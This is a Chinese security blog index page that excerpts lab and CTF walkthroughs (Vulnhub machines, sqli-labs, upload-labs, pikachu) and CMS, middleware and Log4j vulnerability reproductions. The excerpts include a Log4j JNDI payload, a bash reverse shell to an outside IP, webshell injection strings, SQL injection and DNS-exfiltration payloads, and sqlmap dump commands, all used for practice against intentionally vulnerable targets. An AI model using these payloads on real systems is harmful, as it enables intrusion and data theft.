- 博客(45)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 deathnote靶机
这个时候想起来了靶机主页面有一句话,他说我最喜欢的句子是iamjustic3,这个可能是密码吗,我们尝试一下,登陆成功。我们发现了一个robots.txt和wp-login.php挨个访问。打开靶机——>更改网卡(ens33)——>扫描靶机——>访问靶机。一点看不懂,上网搜了一下,这个是Brainfuck编程语言的程序。我们注意到了important.jpg这个图片,一会去访问一下。发现了一个user.txt,去访问一下(not found)ls查看一下发现了user.txt,在cat一下。
2025-01-08 18:45:20
498
原创 常见的框架漏洞复现
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现⼀些问题。其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success 里面的数字是ascii码。shell.asp。
2025-01-05 22:17:21
1178
原创 常见中间件漏洞复现
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执行任意代码执行。这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码。
2025-01-01 13:27:27
1960
原创 未授权访问漏洞
攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感⽂件进⾏修改,最终完全控制服务器。漏洞信息:Kibana如果允许外⽹访问且没有做安全登录认证,就会被外部任意访问,查看所有数据,造成数据泄露。漏洞信息:Elasticsearch服务普遍存在⼀个未授权访问的问题,攻击者通常可以请求⼀个开放9200或9300的服务器进⾏恶意攻击。在使用-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运行的镜像。
2024-12-30 19:58:59
1805
原创 driftingblues6靶机
查看页面源代码,最下面有一个注释,提供了一个网址 vmlist.github.io,我们去访问一下。这里是一个github页面,提供攻防虚拟机的下载,对我们解题并没有什么有用的信息,我们再去扫描端口。把压缩包放到kali中,使用fcrackzip来爆破,或者使用john爆破,这里我使用john爆破。发现上传成功,尝试访问一下,经过多次尝试,我们发现访问成功了。下载了一个压缩包,解压需要密码,我们还需要去尝试爆破。出来了一个spammer文件,去访问一下。翻了半天,找到了一个文件上传的地方。
2024-12-29 16:26:41
402
原创 ASP-CMS漏洞
在slideTextStatus=1后面写上%25><%25eval(request(chr(65)))%25><%25。我们在去访问这个文件config/AspCms_Config.asp再去蚁剑连接,连接成功。打开aspcms靶场。
2024-12-28 16:37:36
459
原创 PhPMyadmin-cms漏洞复现
所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW。输入select @@datadir我们可以看到mysql路径。再用蚁剑连接一下试试。
2024-12-28 16:36:45
569
原创 dede-cms关于shell漏洞
去访问这个/dede/uploads/puls/ad_js.php?来到系统-sql命令行工具写个一句话木马到网站的绝对路径在提交。更改一下主页位置,把html改为php,动态浏览改为生成静态。回到生成-更新主页HTML,点击更新主页HTML——>浏览。再去模板-默认模版管理-index.htm(主页面板)上传一个php文件,内容同样写一个php代码。新建一个php文件,内容写个php脚本语言。来到模块-广告管理——>增加一个新广告。来到生成-更新主页HTML。去连接一下,连接成功。
2024-12-28 11:45:21
349
原创 vulhub-wordpress靶场
搜索:wordpress主题上传的路径wp-content/themes/来到主题,选择editor再选择author-bio.php。点开moban目录后,创建一个php文件,写一个一句话木马。这里就是他的路径,试着访问一下,显示not found。下载完成后对我们有用的东西只有这一个目录,把它拖出来。我们可以去网上找到wordpress主题下载一个。上传成功,我们去搜一下这个cms类型的绝对路径。发现访问到了,去用蚁剑连接一下,连接成功。这里有一个上传主题的地方。我们去访问一下这个文件。
2024-12-28 10:28:39
518
原创 empire靶机
这里已经跑出来了一个文件,我们去访问一下,先访问了mysecret页面显示not found,又去找攻略,结果是个隐藏文件访问.mysecret.txt。我们发现了一段话,大概说的是这是一个秘密目录,这里有他隐藏起来的ssh私钥文件,我们又得知了用户名是icex64,继续在这个路径在搜索文件。在旧版本的Apache服务器中,~ 指代用户主目录,我们可以尝试找到与此相似的路径,这种时候就用到wfuzz了。到这里404就蒙了,去网上搜了一下,用wfuzz工具输入下面这条命令。又得到了一个目录,去访问一下。
2024-12-27 18:38:50
230
原创 jangow靶机
一开始我写的是echo '<?我们进入网站以后,首先扫描一下端口,发现没有有用的信息,在扫一下后台,目前也没有什么有用的信息。但是经过测试,会乱码,多次尝试之后把POST中的cmd缩短,并且把单引号去掉就好了。我们翻了翻,发现了点进buscar中页面空白,但是网址上有一个buscar的参数。输入ifconfig -a查看一下自己的网卡名称,我是ens33。打开靶机,打开kali,有的人会发现扫不到靶机的ip。在网上搜索了半天,发现是靶机的网卡配置有问题。
2024-12-26 16:58:26
602
原创 Vulnhub靶场morpheus获得shell攻略
我们发现我们上传的js语句被保存到了这里,我们就可以想到,用抓包来上传木马,更改文件名,看看能不能成功创建一个新文件。在去扫描一下端口,发现81端口有一个登录的窗口,但是无论怎么做都无法在上面做文章,我们先把这个思路放一下。我们看到了一些文字,一张图片,我们查看一下页面源代码,并没有什么有用的信息。下面是扫描的结果,发现比之前多了两个文件,我们去访问一下php后缀的文件。放行,去访问一下这个文件,页面什么都没有,说明成功被创建。用了dirb扫描一下发现了几个网址,但是都没有用。我们发现了一个输入框。
2024-12-25 17:24:31
562
原创 Log4j2漏洞
也可以输入/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxv6yg.dnslog.cn:9999/aaa}或者${jndi:ldap://${sys:java.version}.xxv6yg.dnslog.cn:9999/aaa}我们把这条语句bash -i >& /dev/tcp/8.155.8.255/6666 0>&1。输入docker-compose up -d开启环境。再用上面的恶意代码类1.8的ldap复制下来去访问。
2024-12-24 17:17:55
554
原创 pikachu靶场RCE漏洞
在输入127&echo "<?输入127&echo "<?>" > 1.txt。写一个木马语句输入进去,访问一下2.txt,看看语句有什么问题。这回没有问题了,为了方便我们就不重新上传了,直接改个名字。打开pikachu靶场RCE中的exec"ping"输入127&ls命令可以执行发现是linux系统。输入127&mv 1.txt 1.php。我们发现$_POST没了。
2024-12-24 17:16:59
361
原创 niushop靶场攻略
输入select load_file(concat('\\\\',(select database()),".ecv0bu.dnslog.cn//abc"))让已经登陆的用户访问这个文件,点击提交,就会被修改了(在这里我尝试了半天,没办法更改,结果是不能设置成中文,要设置成英文或者数字,因为中文在抓包会变成乱码)来到后台登录,我们并不知道登录密码,随便输入一个,去抓包,发送到intruder,设置我们输入的账号密码添加payload。在前端交互界面我们发现有参数,但是试了各种的闭合方式,还是找不到。
2024-12-23 17:39:35
475
原创 Vulhub靶场Apache解析漏洞
原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。创建一个名为1.php.jpg的文件,内容输入。
2024-12-21 19:14:31
604
原创 Vulhub靶场Nginx解析漏洞复现
原理:这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /xx.jpg/xx.php 解析为 php ⽂件。当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。上传成功,访问一下我们的文件,删除一个g,再抓包。再上传,发现上传成功了。
2024-12-21 19:11:33
854
原创 IIS漏洞复现
在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。原理:在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。注意:小皮开的哪个PHP版本就要去修改那个版本的php.ini文件!在a.asp目录里创建一个1.jpg的文件,内容为<%=now()%>不会被解析,说明在.asp文件夹中任何文件都会被当做.asp文件解析。
2024-12-21 19:09:32
641
原创 hackme靶机保姆及攻略
输入sqlmap -r 1.txt -D webapphacking -T users -dump。我们再去检查一下是否上传木马成功(由于我们写的木马是GET方式提交的,所以直接在网址上尝试执行)输入sqlmap -r 1.txt -D webapphacking --tables。说明闭合点为单引号,开始手工注入。接下来就是我们熟悉的sql注入,这里我们尝试找到他的闭合点。输入sqlmap -r 1.txt -dbs。输入arp-scan -l扫描主机,第三个。去抓包,在搜索框中输入1,抓包。
2024-12-20 18:04:34
374
原创 upload-labs靶场保姆级攻略
我们利用image参数访问/var/log/auth.log。我用的工具是MobaXterm Professional。只有一个西红柿的图片,我们查看一下源码,发现什么也没有。去访问挨个访问,发现8888端口的这个会弹出登录的弹窗。我们在利用远程连接工具登录tomato的弹窗。输入arp-scan -l扫描主机,第三个。翻到最下面我们会看到在日志文件的内容。我们用御剑端口工具扫描一下这个网址。每个目录访问一下,在查看源代码。我们再去用dirb扫一下。远程主机:靶场的IP地址。打开靶机,利用kali。
2024-12-20 18:02:29
228
原创 upload-labs靶场保姆级攻略
创建一个名为1.gif的文件,里面写我们的木马语句,在木马语句前面加上一个GIF89a。将我们的木马1.php写成1.php2或者1.php3或者1.php4等等上传。在创建一个名为1.png的文件,1.png文件里面是我们的一句话木马。先上传.htaccess后再上传1.png文件,再去查看是否上传成功。我们创建一个1.jpg的文件,里面写上我们的木马,然后开始上传抓包。我们尝试把1.php改成1.Php再上传,在查看是否上传成功。创建一个名为1.jpg的文件,里面写我们的一句话木马。
2024-12-19 18:51:28
2148
原创 关于XXE靶场保姆级攻略
我们发现了他有很多xml的字样,说明我们可以用xml进行攻击,上图下方框中的是html字样,这就是我们的注入点。system后面是我们想要找到的文件目录,这里我要找的是c盘中得flag目录中的flag文件。我们用御剑后台工具扫一下,或者手工尝试会发现,有一个robots.txt的机器人协议。它说flag就在这里,我们复制下来经过多次尝试,先使用32解码,在使用64解码。再去base64解码得到了一大长串的东西,把它放在php中运行一下。得到了一个flagmeout.php的文件,再去xml一下。
2024-12-18 14:55:07
638
原创 CTFHUB靶场关于SSRF保姆级攻略
这里有一个题目附录,在这关我们需要用到一款名为Gopherus工具,还需要用到python2的环境,我这里是在kali做的,工具大家自己去下载。这里我们直接点旁边的X,结束,在访问一下shell.php,看看我们的木马是否写进去了。将结果复制,打开记事本,把%0a替换为%0d%0a,再把结尾加上%0d%0a。保存后带年纪浏览,选中这个木马文件,这个时候打开代理,准备抓包。
2024-12-17 20:22:37
1119
原创 SQL靶场第九关攻略
我们的第九关需要用到时间盲注使用条件:完全没有变化的页面我们在了解一下时间盲注和布尔盲注的区别,时间盲注比布尔盲注多了一个if判断加上sleep()函数的运用if(a,b,c) if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c;sleep()函数 网页延迟n秒后,输出结果。
2024-12-07 20:58:19
829
原创 WAT绕过姿势
分块传输编码(Chunked transfer encoding)是只在 HTTP 协议 1.1 版本(HTTP/1.1) 中提供的⼀种数据传送机制。以往 HTTP 的应答中数据是整个⼀起发送的,并在 应答头⾥ Content-Length字段标识了数据的⻓度,以便客户端知道应答消息的结束;传统的 Content-length 解决⽅案:计算实体⻓度,并通过头部告诉对⽅。浏览器 可以通过 Content-Length 的⻓度信息,判断出响应实体已结束;
2024-12-07 20:15:12
1084
原创 SQL靶场第八关攻略
输入?id=1 and 1=1--+输入?id=1 and 1=2--+页面都正常,说明不是数值型输入?id=1'页面没有回显加上--+页面正常,说明是字符型注入输入?id=1' order by 3--+页面正常输入?id=1' order by 4--+页面没有回显,说明一共有三列我们需要用到布尔盲注输入?id=1' and length(database())>7--+页面正常输入?id=1' and length(database())>8--+页面无回显,说明数据库长度为8位我们要用到substr
2024-12-05 21:17:11
1059
原创 SQL靶场第七关攻略
' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去。id=1')) order by 4--+页面异常,说明有3列。id=1')) order by 3--+页面正常。id=1'))--+
2024-12-05 19:56:40
578
原创 SQL靶场第六关
id=1" and updatexml(1,concat(1,(select concat(id,'~',username,'~',password) from users limit 1,1)),1)--+id=1" and updatexml(1,concat(1,(select concat(id,'~',username,'~',password) from users limit 0,1)),1)--+我们先判断回显点,输入?以上就是sql靶场第六关的通关攻略!发现没有回显点,我们利用报错注入。
2024-12-05 18:44:07
424
原创 AI WEB 靶场(手工版)
一.用御剑扫描靶场ip,我们发现了robots.txt我们在去网站访问一下robots.txt,然后再每个目录都访问一下当我们访问到se3reTdir777的时候,会出现这个提交窗口二.sql注入(手工)
2024-12-04 18:34:48
263
原创 AI WEB 靶场(工具版)
在kali操作系统中打开终端输入sqlmap,看有没有这个工具,如果没有安装一下,输入apt install sqlmap就会安装成功。输入sqlmap -r 1.txt -D aiweb1 -T user --columns --batch。输入sqlmap -r 1.txt -D aiweb1 -T user --dump --batch。输入sqlmap -r 1.txt -D aiweb1 --tables。(-D:数据库,aiweb1:数据库名)(-T:数据表,user:表名)
2024-12-04 18:32:51
1035
原创 SQL靶场第四关
输入?id=1页面正常输入?id=1'发现页面也正常输入?id=1",页面异常,说明存在sql报错注入在输入?id=1" --+页面还是报错。
2024-12-03 20:36:57
361
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人